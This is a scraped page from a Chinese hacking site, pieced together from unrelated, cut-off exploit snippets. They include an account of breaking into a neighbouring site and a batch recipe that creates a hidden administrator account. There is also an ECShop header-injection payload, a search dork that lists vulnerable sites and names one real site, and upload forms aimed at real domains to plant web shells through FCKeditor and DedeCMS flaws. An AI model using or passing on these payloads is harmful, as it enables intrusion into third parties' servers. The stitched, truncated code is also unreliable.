www.cn9x.com www.cnyzy.cn
FEED订阅数一览
EMAIL订阅FEED
寻求与台湾,韩国,国外公司或是个人或是团队的商业合作!我们拥有专业的计算机知识以及近十年的网络技术经验,拥有自已的专业积累数据库和资源。诚意找寻长期的合作伙伴。有意请直接联系QQ:635465491 注明:商业合作
评论就不能开。一打开全是广告。晕死。还是关了,有要说话的朋友,辛苦一点直接留言吧。呵呵。留言本在网站的上方或直接点这里留言 http://www.cnyzy.cn/guestliyan.asp
影子鹰安全网络启用全新域名国内顶级域名:www.cnyzy.cn (CN为中国缩写,YZY为影子鹰缩写)国际顶级域名:www.cn9x.com (CN为中国缩写,9为极数,最大的意思,X代表商业结构)
今晚在搞个黑客站的时候拿下旁站权限,但不能夸到目标站的目录下,眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权,单asp一执行pr就卡死了。。 无奈之下找了群里龙儿心一起来研究,龙儿心经验不错,到shell上立马就搞定了目标站的路径,获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的,这个在我blog中有一个文章帖出来代码。这里我将就再帖下,并说明用法!Set ObjService=GetObject("IIS://LocalHost/W3SVC")
漏洞出在根目录的auction_list.php,第77行-86行:/* 浏览记录 */ $getcookie = get_hisgoods_cookie(); $goodshistory = array();
直接百度或者google一下关键字:inurl:CompHonorBig.asp?id 出现了很多站点..百度一下,找到相关网页约35,700篇,用时0.231秒我们到后面几页随便打开一个 http://www.xzruizhe.com/
可以通过特殊字符建立隐藏账户.命令行界面下不显示,用户管理面板中显示为空.非$..可以通过智能ABC输入法中V9里的空白字符建立隐藏帐号,命令行下无法建立,可以先写个批处理,如下:net user 123 /addnet localgroup administrators /add
/affiche.php,php5环境提示错误暴露程序路径,php4环境显示写入的信息charset参数未做严谨过滤导致http消息头截断写入http://localhost/test/ecshop/affiche.php?act=js&type=3&from=xxx&ad_id=1&charset=GBK%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0A%0D%0AContent-Type:%20text/html%0D%0A%0D%0AContent-Length:%2035%0D%0A%0D%0A%3Chtml%3Exxx%3C/html%3E%0D%0A%0D%0A
动网(DVBBS)PHP论坛preview.php代码执行漏洞动网(DVBBS)论坛系统是一个采用PHP和MYSQL的数据架构的高性能网站论坛解决方案。在文件preview.php中:
<form id="frmUpload" enctype="multipart/form-data" action="http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br><input type="file" name="NewFile" size="50"><br><input id="btnUpload" type="submit" value="Upload"></form>
本地包含的利用方法。<form action=”http://www.ra1nker/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post” method=”post” enctype=”multipart/form-data” name=”QuickSearch” id=”QuickSearch”><input type=”hidden” name=”newname” value=”1.asa”><input type=”file” name=”uploadfile”>
NetCMS网站内容管理系是国内最优秀的网站建设程序,全免费全开源 ,由于发表消息附件未进行严格过滤,导致可上传任意文件漏洞。测试利用: 1、进去, /user/login.aspx ,点注册。